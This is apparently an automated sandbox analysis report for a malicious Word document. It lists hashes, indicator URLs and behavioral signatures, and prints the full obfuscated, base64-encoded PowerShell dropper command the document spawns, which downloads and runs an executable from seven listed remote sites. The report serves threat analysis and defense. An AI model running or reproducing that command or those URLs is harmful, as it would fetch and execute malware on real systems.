Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/09/2024, 09:01

General

  • Target

    ed4208fb279021678a791818606d3981_JaffaCakes118.doc

  • Size

    238KB

  • MD5

    ed4208fb279021678a791818606d3981

  • SHA1

    5eb08220ced38b83488ec0403cab60262c90636d

  • SHA256

    493fbab43b8eaf0772394866842fa9474e8e54a84894498828af06590dff1cbd

  • SHA512

    fe1a4722d90f4120e2e8eb8a43dcfc956c8ea32efc69bd2b88779460af02fa2038342f2483b4d4ef52b886d1500f8e9bbc1ccc3ed4f4a422809030ea3f742aff

  • SSDEEP

    3072:7j6yw1MgpQiBhGWb6esLbTh8YuyDRBFtdfGkP+M2jwaBpd:7HgtEWPsL/aTyT9GkP+M2jwaBL

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://saimission.org/sai/fU/

exe.dropper

https://toprakmedia.com/cgi-bin/F/

exe.dropper

http://tonmeister-berlin.de/Dokumente/Zqmb3/

exe.dropper

http://www.essand.com/test/SOx5LA/

exe.dropper

http://gzamora.es/9s52_ou17husakvth9fs_resource/sFe3aa/

exe.dropper

http://powerfrog.net/Anna/ifqE/

exe.dropper

http://sasystemsuk.com/recruit/H/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ed4208fb279021678a791818606d3981_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:916
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABQAGIAZABiAGQAdQA0AD0AKAAnAFYAcgB6ACcAKwAnAHMAdQBuAGcAJwApADsAJgAoACcAbgBlACcAKwAnAHcAJwArACcALQBpAHQAZQBtACcAKQAgACQARQBOAHYAOgB0AGUATQBwAFwAbwBmAGYAaQBjAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIARQBDAHQATwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBjAFUAcgBgAEkAdABZAGAAUAByAE8AYABUAE8AYwBPAEwAIgAgAD0AIAAoACcAdABsACcAKwAnAHMAMQAyACwAIAB0AGwAcwAnACsAJwAxACcAKwAnADEALAAgAHQAbABzACcAKQA7ACQARwB4AHcAawA5AG4AMwAgAD0AIAAoACcAVgBxAGkAbwA0ACcAKwAnADMAJwArACcAMAAnACkAOwAkAE4AawBoAHMAbABnADUAPQAoACcATABqACcAKwAnAG0AOQBtACcAKwAnAG0AeAAnACkAOwAkAEUAbQB3AG8ANQBvAHYAPQAkAGUAbgB2ADoAdABlAG0AcAArACgAKAAnAGsAegBFACcAKwAnAE8AZgBmACcAKwAnAGkAYwBlACcAKwAnADIAMAAxADkAJwArACcAawB6AEUAJwApAC4AIgBSAGUAUABsAGAAQQBgAEMAZQAiACgAKABbAGMAaABBAHIAXQAxADAANwArAFsAYwBoAEEAcgBdADEAMgAyACsAWwBjAGgAQQByAF0ANgA5ACkALAAnAFwAJwApACkAKwAkAEcAeAB3AGsAOQBuADMAKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwAkAE8AZAB1AG0AMQBjAG4APQAoACcATAAnACsAJwBmACcAKwAnAHEAcgBmAG8AMwAnACkAOwAkAFgAaABnAG8AMQBwAGYAPQAmACgAJwBuAGUAdwAtAG8AYgBqACcAKwAnAGUAJwArACcAYwB0ACcAKQAgAE4AZQB0AC4AVwBFAGIAYwBMAEkARQBOAFQAOwAkAEsAYwBnAHAAZQA5AHEAPQAoACcAaAB0AHQAcAAnACsAJwA6AC8ALwBzACcAKwAnAGEAJwArACcAaQBtAGkAJwArACcAcwBzAGkAbwBuAC4AJwArACcAbwByAGcALwAnACsAJwBzACcAKwAnAGEAaQAvACcAKwAnAGYAVQAvACoAaAB0AHQAcABzADoALwAvAHQAbwBwAHIAYQBrAG0AJwArACcAZQBkAGkAYQAuAGMAbwBtAC8AYwAnACsAJwBnACcAKwAnAGkAJwArACcALQAnACsAJwBiAGkAJwArACcAbgAnACsAJwAvAEYAJwArACcALwAqAGgAJwArACcAdAB0AHAAOgAnACsAJwAvAC8AdABvAG4AbQBlACcAKwAnAGkAcwAnACsAJwB0AGUAcgAtAGIAZQAnACsAJwByAGwAJwArACcAaQBuAC4AZABlACcAKwAnAC8ARAAnACsAJwBvACcAKwAnAGsAdQBtACcAKwAnAGUAbgB0AGUALwBaAHEAJwArACcAbQAnACsAJwBiADMALwAqACcAKwAnAGgAdAB0ACcAKwAnAHAAOgAnACsAJwAvAC8AdwAnACsAJwB3ACcAKwAnAHcAJwArACcALgBlAHMAcwAnACsAJwBhAG4AZAAnACsAJwAuACcAKwAnAGMAbwBtACcAKwAnAC8AJwArACcAdAAnACsAJwBlAHMAdAAvAFMATwAnACsAJwB4ADUAJwArACcATABBAC8AKgBoAHQAdAAnACsAJwBwACcAKwAnADoAJwArACcALwAvACcAKwAnAGcAegAnACsAJwBhAG0AJwArACcAbwByAGEAJwArACcALgBlAHMALwA5AHMANQAyAF8AJwArACcAbwAnACsAJwB1ADEAJwArACcANwBoAHUAcwBhACcAKwAnAGsAdgB0ACcAKwAnAGgAJwArACcAOQBmAHMAXwByAGUAcwBvACcAKwAnAHUAJwArACcAcgAnACsAJwBjAGUALwBzAEYAZQAnACsAJwAzAGEAYQAvACoAaAAnACsAJwB0AHQAcAA6AC8ALwAnACsAJwBwAG8AdwBlAHIAZgByACcAKwAnAG8AZwAuAG4AZQB0AC8AJwArACcAQQBuACcAKwAnAG4AYQAvAGkAZgBxAEUALwAqAGgAdAB0AHAAOgAvAC8AcwBhAHMAeQBzAHQAZQAnACsAJwBtACcAKwAnAHMAJwArACcAdQBrAC4AYwBvAG0ALwAnACsAJwByAGUAYwAnACsAJwByAHUAaQAnACsAJwB0AC8AJwArACcASAAnACsAJwAvACcAKQAuACIAUwBwAEwAYABpAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABCAGUAdAA1AG4AawBoAD0AKAAnAFEAJwArACcAdgBjAGwAYQBqAGYAJwApADsAZgBvAHIAZQBhAGMAaAAoACQATQBpADQAMAAwAHAAbgAgAGkAbgAgACQASwBjAGcAcABlADkAcQApAHsAdAByAHkAewAkAFgAaABnAG8AMQBwAGYALgAiAGQAYABPAHcAYABOAEwAbwBgAEEAZABmAGkAbABlACIAKAAkAE0AaQA0ADAAMABwAG4ALAAgACQARQBtAHcAbwA1AG8AdgApADsAJABVAHgANgB6AGgAdwBrAD0AKAAnAFgAJwArACcAbQBiACcAKwAnAGcAMgBtADAAJwApADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEUAbQB3AG8ANQBvAHYAKQAuACIATABgAGUATgBnAHQAaAAiACAALQBnAGUAIAAyADEAMgA2ADIAKQAgAHsAJgAoACcASQAnACsAJwBuACcAKwAnAHYAJwArACcAbwBrAGUALQBJAHQAZQBtACcAKQAoACQARQBtAHcAbwA1AG8AdgApADsAJABOADYAaAA0ADUAaQBqAD0AKAAnAFgAMQBlAF8AYwAnACsAJwA2ACcAKwAnAGgAJwApADsAYgByAGUAYQBrADsAJABZAHoAdAB0AGMAeABxAD0AKAAnAEMAOABiAGoAYQAnACsAJwA4AGsAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABBADUAdABvADkAMQAwAD0AKAAnAFAAJwArACcANABrADgAJwArACcAZgBxADYAJwApAA==
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3412

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCDC285.tmp\iso690.xsl

    Filesize

    263KB

    MD5

    ff0e07eff1333cdf9fc2523d323dd654

    SHA1

    77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

    SHA256

    3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

    SHA512

    b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f0lt11dt.p3j.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

    Filesize

    2B

    MD5

    f3b25701fe362ec84616a93a45ce9998

    SHA1

    d62636d8caec13f04e28442a0a6fa1afeb024bbb

    SHA256

    b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

    SHA512

    98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

    Filesize

    1KB

    MD5

    9530d77de869741bbf5c7d56ace28057

    SHA1

    823043d632512f37ebfe580052c8c4ca6c4e3312

    SHA256

    1294ebfd5dd3378698ddc9713a6db6fdfff68ef37fc61e9be88e0b3cb4a3a4b3

    SHA512

    b078ea0ad620846541f8cf8e8d5feb63beee2f9628dd5eb9e29ada07bec00267c27a6fee784d4a2990431c82c28330642ee2b81bae53747a0ce154b4786d0c63

  • memory/916-24-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

    Filesize

    2.0MB

  • memory/916-3-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

    Filesize

    64KB

  • memory/916-6-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

    Filesize

    2.0MB

  • memory/916-11-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

    Filesize

    2.0MB

  • memory/916-13-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

    Filesize

    2.0MB

  • memory/916-12-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

    Filesize

    2.0MB

  • memory/916-14-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

    Filesize

    2.0MB

  • memory/916-15-0x00007FFF49C30000-0x00007FFF49C40000-memory.dmp

    Filesize

    64KB

  • memory/916-10-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

    Filesize

    2.0MB

  • memory/916-9-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

    Filesize

    2.0MB

  • memory/916-8-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

    Filesize

    2.0MB

  • memory/916-7-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

    Filesize

    64KB

  • memory/916-16-0x00007FFF49C30000-0x00007FFF49C40000-memory.dmp

    Filesize

    64KB

  • memory/916-23-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

    Filesize

    2.0MB

  • memory/916-0-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

    Filesize

    64KB

  • memory/916-605-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

    Filesize

    2.0MB

  • memory/916-603-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

    Filesize

    64KB

  • memory/916-2-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

    Filesize

    64KB

  • memory/916-5-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

    Filesize

    2.0MB

  • memory/916-86-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

    Filesize

    2.0MB

  • memory/916-87-0x00007FFF8BD4D000-0x00007FFF8BD4E000-memory.dmp

    Filesize

    4KB

  • memory/916-88-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

    Filesize

    2.0MB

  • memory/916-89-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

    Filesize

    2.0MB

  • memory/916-90-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

    Filesize

    2.0MB

  • memory/916-1-0x00007FFF8BD4D000-0x00007FFF8BD4E000-memory.dmp

    Filesize

    4KB

  • memory/916-99-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

    Filesize

    2.0MB

  • memory/916-604-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

    Filesize

    64KB

  • memory/916-4-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

    Filesize

    64KB

  • memory/916-601-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

    Filesize

    64KB

  • memory/916-602-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

    Filesize

    64KB

  • memory/3412-580-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3412-100-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3412-75-0x0000019AA0310000-0x0000019AA0332000-memory.dmp

    Filesize

    136KB

  • memory/3412-69-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp

    Filesize

    2.0MB